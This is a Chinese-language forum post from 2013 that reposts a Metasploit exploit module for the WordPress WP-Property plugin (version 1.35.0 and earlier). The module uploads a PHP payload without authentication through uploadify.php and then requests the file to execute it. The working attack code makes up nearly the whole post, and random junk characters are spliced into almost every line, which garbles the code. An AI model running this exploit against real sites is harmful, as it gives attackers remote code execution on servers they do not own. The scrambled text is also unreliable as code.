WordPress WP-Property PHP 文件上传漏洞
) ^) c r- y |1 k# Z2 r4 V: T' F2 }& E0 q7 d& l7 Y( q
## # This file is part of the Metasploit Framework and may be subject to
& `/ K0 R4 q6 n0 X* ]' b& r" }) e0 Q* |
# redistribution and commercial restrictions. Please see the Metasploit$ x6 c; _. S x4 k- [
3 Q0 g3 @- W8 t, A: K& o" ~ D. ~# Framework web site for more information on licensing and terms of use.
, p: M' o. B, m# A3 c2 x2 K) y% T4 H! `4 Z0 L. p0 X1 Q
# http://metasploit.com/framework/ ##
' b: ?! q3 J8 ?" |! D# J
8 H" s' {4 w$ w : J3 N7 C! d+ w4 O, M2 T2 W4 d
[: [: ]: n$ a
! Z/ E2 H" @6 s9 S$ D
! U, s0 K3 ]$ Lrequire 'msf/core', h7 j: E6 U! k4 Y- T
require 'msf/core/exploit/php_exe'
! x) a- u! M0 k! M1 q. r5 x% ^) x1 P W* k5 o
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
$ O& n+ c3 Z; |& |7 S: U'Description' => %q{
; ^" I( W/ O, V. AThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
! ?7 x/ T$ ?" U& v. u9 e, H[9 \+ ~ N( e" J$ p% k' ~
'Sammy FORGIT', # initial discovery
! E3 Z# }! z1 i& G1 h, _6 P# h' r'James Fitts <fitts.james[at]gmail.com>' # metasploit module( R- _9 ]: ~& W0 _ @5 B
],
5 j w0 F3 D" X6 V& N0 O% d'License' => MSF_LICENSE,
9 M# O0 \. a; F+ X! k. v' u'References' =>( B. M& K+ A+ J. Q
[5 V0 O- g& `4 t6 P& Z0 M2 C
[ 'OSVDB', '82656' ],9 m3 ~5 @* y% s7 Z
[ 'BID', '53787' ],
6 Y) @7 s5 r+ i: _; \[ 'EDB', '18987'],, O- V0 ~$ s1 b8 |6 Q$ Z) e
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
6 D/ r) W+ g5 m# ]0 {],) I4 A6 ~: i' U9 N5 R
'Payload' =>
0 f8 k$ j1 O: `# w2 E" y0 {/ M{- d( M% N2 |: D8 s
'BadChars' => "\x00",1 ]( O. c& s, _# @9 h( m& [' j1 w
},
" m, @' s& R* B$ l/ R9 D'Platform' => 'php',
' @5 O. h1 h, g% E'Arch' => ARCH_PHP,( w/ c/ t2 E) V" Q
'Targets' =>
8 l0 N1 ?% S, _, H L6 n[: l9 e; K# r" n
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],6 L5 u L" I1 O. M6 [+ o; k2 r6 a/ A
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]8 E& ~* l3 @8 n( S# f: x* }
],8 Q/ _5 C! d9 i( y
'DefaultTarget' => 0,
& H4 ]( N% T% o% N$ R'DisclosureDate' => 'Mar 26 2012'))
6 A. u+ Z9 W% U7 [- w+ t8 Y7 K0 ~, }8 b% |& Z" H* C4 N
register_options(
" f5 C6 j$ @$ ~* O' s[+ k3 _& u. ]- V& W- a: ~6 W
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])) B; y: t* ?1 V! C2 L
], self.class)
/ y/ z! B4 v" }6 o+ Mend7 A7 t/ @ L! t
* `4 a% B! l9 @0 A: z, J" ?
def check
; M8 h3 R Q6 Zuri = target_uri.path
! r! @: t$ d5 j& @4 ~uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
% n+ N- u. x$ s8 q0 a* Q'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php": q# |8 \. Z# S1 N8 Y
})
% F% I$ J6 B& ~, C
2 v; X, ?+ P# a5 pif not res or res.code != 200
$ H0 |( h/ [: f2 X" L( Preturn Exploit::CheckCode::Unknown1 ^( M5 ^0 K9 @0 E
end0 Q3 E, f7 Q- T4 d
$ t: i) X) b5 I& \8 w# B/ Nreturn Exploit::CheckCode::Appears. [4 P4 n4 N2 o* m( c% G( s: ^
end
1 P- `5 G* D& P0 N# n
5 t& g6 H; E/ }2 `$ B: P. q* h) fdef exploit3 t J. ]2 Q& ?+ f) k) ]* H
uri = target_uri.path
9 M6 Q0 }6 a! F* Q) H6 p1 Vuri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)3 g- O$ e* g( g: S8 b, D
! Y# ]0 I- k' ?data = Rex::MIME::Message.new2 l: o& ~2 K2 b+ X3 n& S. n
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")7 }) N, f9 c+ U6 g# A# z
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
8 l9 M5 ?9 L. s: R) K }post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
( \: D- V0 ]; ?8 ]3 i9 |/ k$ G
& h# h6 b+ y, i _: F& yprint_status("#{peer} - Uploading payload #{@payload_name}")
2 ]: G# ~ h% @4 N" Dres = send_request_cgi({- X1 N% r- s6 M; c/ b5 n- D
'method' => 'POST',! y: y6 I0 F2 j3 G+ L# Y1 w
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",+ }- v* e8 i8 \
'ctype' => "multipart/form-data; boundary=#{data.bound}",
8 O% b- l& e, `1 M. u" h2 M' M'data' => post_data+ o9 b4 i ~! ?! t1 ~/ v
})4 I5 W/ z+ n/ z/ p. m% D
c$ P: ?8 _4 i. `, ]$ c& h
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
2 D6 C$ a, j& d+ @2 Tfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
" R+ R3 L9 q! a2 |1 Aend! ^# a( l: Z0 e
- L0 k6 z7 m5 l1 Y6 e7 W6 l
upload_uri = res.body8 }+ H+ C* K* G z4 P! r6 D
( F4 V0 b- d' }' o, Q* N/ Fprint_status("#{peer} - Executing payload #{@payload_name}")# U; Y% P5 Y4 [5 C. j, g. {, o
res = send_request_raw({
?# l9 P! W5 o: [/ y. V'uri' => upload_uri,/ @$ B8 ]7 X% w+ J5 z& Q. L) p9 l
'method' => 'GET'
! A" T7 V6 W- e$ B1 Y7 P})
! F( L& a, {* K6 G9 I6 n- Gend
/ B& J. \# j" w2 _$ h" wend
9 _3 M& O% D8 F
: I. V, H; p' U! S不要问我这写的是什么 怎么利用 我是说msf.1 f2 v z+ \4 Q+ _+ M& v# ?4 ~
8 `: R6 S( `% ]- j1 N% H- t( r8 g
|
发表于 2013-1-4 19:51:30
收藏
支持
反对